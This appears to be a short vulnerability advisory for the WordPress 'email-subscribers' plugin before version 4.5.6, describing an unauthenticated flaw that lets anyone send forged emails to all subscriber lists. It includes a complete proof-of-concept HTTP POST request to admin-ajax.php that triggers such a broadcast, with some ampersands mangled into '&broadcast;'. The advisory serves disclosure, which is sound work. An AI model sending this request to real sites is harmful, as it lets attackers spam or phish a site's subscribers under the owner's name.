It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 222 action=admin_init&broadcast;_data[id]=999&ig;_es_broadcast_submitted=submitted&broadcast;_data[subject]=test999&broadcast;_data[body]=body-content&broadcast;_data[list_ids]=2&broadcast;_data[meta][scheduling_option]=schedule_now
CPE | Name | Operator | Version |
---|---|---|---|
email-subscribers | lt | 4.5.6 |